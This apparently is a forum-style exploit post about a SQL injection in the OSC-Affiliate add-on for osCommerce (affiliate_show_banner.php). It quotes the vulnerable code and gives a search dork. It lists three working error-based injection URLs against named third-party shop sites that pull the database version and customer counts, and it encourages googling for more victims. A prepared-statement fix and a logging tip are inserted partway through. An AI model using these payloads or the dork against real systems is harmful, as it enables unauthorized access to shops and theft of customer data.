SQL Injection in
/affiliate_show_banner.php
PHP code:
/*
$Id: affiliate_show_banner.php,v 2.00 2003/10/12
OSC-Affiliate
Contribution based on:
osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com
Copyright (c) 2002 - 2003 osCommerce
Released under the GNU General Public License
*/
Vulnerable code
PHP code:
// affiliate_banner_id is taken from the request as-is; a POST value overrides a GET value
if (isset($HTTP_GET_VARS['affiliate_banner_id'])) $banner_id = $HTTP_GET_VARS['affiliate_banner_id'];
if (isset($HTTP_POST_VARS['affiliate_banner_id'])) $banner_id = $HTTP_POST_VARS['affiliate_banner_id'];
/*..................................................*/
if ($banner_id) {
    // the user-controlled value is concatenated straight into the SQL string with no cast or escaping
    $sql = "select affiliate_banners_image, affiliate_products_id from " . TABLE_AFFILIATE_BANNERS . " where affiliate_banners_id = '" . $banner_id . "' and affiliate_status = 1";
    $banner_values = tep_db_query($sql);
    if ($banner_array = tep_db_fetch_array($banner_values)) {
        $banner = $banner_array['affiliate_banners_image'];
        $products_id = $banner_array['affiliate_products_id'];
    }
}
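The same lookup with the injection point closed, as an added example that is not code from the original post or from OSC-Affiliate: the id is validated as a positive integer and bound as a prepared-statement parameter instead of being concatenated into the query. It assumes a mysqli connection in $db (with mysqlnd for get_result) and the osCommerce constant TABLE_AFFILIATE_BANNERS.

```php
<?php
// Added example, not from the original post or OSC-Affiliate. Assumes a mysqli
// connection in $db (mysqlnd available) and the constant TABLE_AFFILIATE_BANNERS.

function fetch_affiliate_banner(mysqli $db, $raw_id): ?array
{
    // affiliate_banners_id is a numeric key: reject anything that is not a
    // positive integer before it gets anywhere near the query. Payloads that
    // append quotes, operators or subqueries fail this check outright.
    if (!is_string($raw_id) && !is_int($raw_id)) {
        return null;
    }
    $valid = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($valid === false) {
        return null;
    }
    $banner_id = (int)$raw_id;

    // Prepared statement: only the trusted table-name constant is concatenated;
    // the id is bound as an integer parameter, so the query structure is fixed.
    $sql = 'select affiliate_banners_image, affiliate_products_id from '
         . TABLE_AFFILIATE_BANNERS
         . ' where affiliate_banners_id = ? and affiliate_status = 1';
    $stmt = $db->prepare($sql);
    $stmt->bind_param('i', $banner_id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

// Same precedence as the original: a POST value overrides a GET value.
$raw_id = $_POST['affiliate_banner_id'] ?? $_GET['affiliate_banner_id'] ?? null;
if ($raw_id !== null && ($banner_array = fetch_affiliate_banner($db, $raw_id))) {
    $banner      = $banner_array['affiliate_banners_image'];
    $products_id = $banner_array['affiliate_products_id'];
}
```

Requests whose affiliate_banner_id is not a plain positive integer are now answered with no banner at all, which is also the condition worth alerting on in web logs for this script.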
Dork:
inurl:affiliate_show_banner.php
Ex:
Code:
http://www.arcalide.com/affiliate_show_banner.php?ref=1&affiliate_banner_id=1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))--+'
http://www.smoke-world.info/affiliate_show_banner.php?ref=1&affiliate_banner_id=1+and(select+1+from(select+count(*),concat((select+count(*)+from+customers+limit+0,1),floor(rand(0)*2))x+from+customers+group+by+x)a)--+
http://millybridaluk.com/catalog/affiliate_show_banner.php?ref=1&affiliate_banner_id=1%27+AND+extractvalue(1,/*!concat*/(0x3a,(version())))--+%27
Works only on old versions, but nevertheless you can google quite a few buggy sites.